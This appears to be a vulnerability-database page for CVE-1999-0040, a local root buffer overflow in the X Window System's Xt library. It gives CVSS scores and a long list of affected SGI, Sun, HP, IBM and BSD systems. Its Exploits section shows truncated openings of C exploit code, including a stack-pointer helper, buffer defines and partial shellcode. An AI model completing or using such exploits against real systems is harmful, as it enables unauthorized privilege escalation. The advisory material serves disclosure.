7.2
CVSSv2

CVE-1999-0040

Published: 01/05/1997 Updated: 17/08/2022
CVSS v2 Base Score: 7.2 | Impact Score: 10 | Exploitability Score: 3.9
VMScore: 745
Vector: AV:L/AC:L/Au:N/C:C/I:C/A:C

Vulnerability Summary

Buffer overflow in Xt library of X Windowing System allows local users to execute commands with root privileges.

Vulnerable Product Search on Vulmon Subscribe to Product

sgi irix 5.3

sgi irix 4.0

sgi irix 6.1

sgi irix 6.4

sgi irix 5.0

sgi irix 6.0

sgi irix 6.3

sgi irix 6.2

sun sunos 5.3

hp hp-ux 10.30

nec ews-ux v 4.2mp

hp hp-ux 9.10

sun sunos 4.1.4

hp hp-ux 10.01

sun solaris 2.4

hp hp-ux 10.00

sun solaris 2.5.1

hp hp-ux 9.00

nec ews-ux v 4.2

hp hp-ux 10.20

hp hp-ux 10.24

sun sunos 5.4

sun sunos 5.5

sun sunos 5.5.1

bsdi bsd os 2.0.1

bsdi bsd os 2.1

freebsd freebsd 1.1.5.1

ibm aix 4.2

nec asl ux 4800 64

sun solaris 2.5

sun sunos 4.1.3u1

bsdi bsd os 2.0

hp hp-ux 10.08

hp hp-ux 10.34

sun sunos 4.1.3

hp hp-ux 10.09

hp hp-ux 10.16

freebsd freebsd 2.0

ibm aix 3.2

ibm aix 4.1

nec up-ux v 4.2mp

hp hp-ux 10.10

hp hp-ux 9.01

Exploits

/* source: wwwsecurityfocuscom/bid/237/info The libXt library is part of the X Windows system There are several buffer overflow conditions that may allow an unauthorized user to gain root privileges through setuid and setgid programs that are linked to libXt These problems were openly discussed on the Bugtraq mailing list in 1996, this ...
#include #include #include #define DEFAULT_OFFSET 0 #define BUFFER_SIZE 1491 long get_esp(void) { __asm__("movl %esp,%eax\n"); } main(int argc, char **argv) { char *buff = NULL; unsigned long *addr_ptr = NULL; char *ptr = NULL; char execshell[] = "\xeb\x23" "\x5e" "\x8d\x1e" "\x89\x5e\x0b" "\x31\xd2" "\ ...
/* cxterm buffer overflow exploit for Linux This code is tested on both Slackware 31 and 32 Ming Zhang mzhang@softcomnet */ #include <unistdh> #include <stdioh> #include <stdlibh> #include <fcntlh> #define CXTERM_PATH "/usr/X11R6/bin/cxterm" #define BUFFER_SIZ ...
/* source: wwwsecurityfocuscom/bid/237/info The libXt library is part of the X Windows system There are several buffer overflow conditions that may allow an unauthorized user to gain root privileges through setuid and setgid programs that are linked to libXt These problems were openly discussed on the Bugtraq mailing list in 1996, this ...
/* source: wwwsecurityfocuscom/bid/237/info The libXt library is part of the X Windows system There are several buffer overflow conditions that may allow an unauthorized user to gain root privileges through setuid and setgid programs that are linked to libXt These problems were openly discussed on the Bugtraq mailing list in 1996, thi ...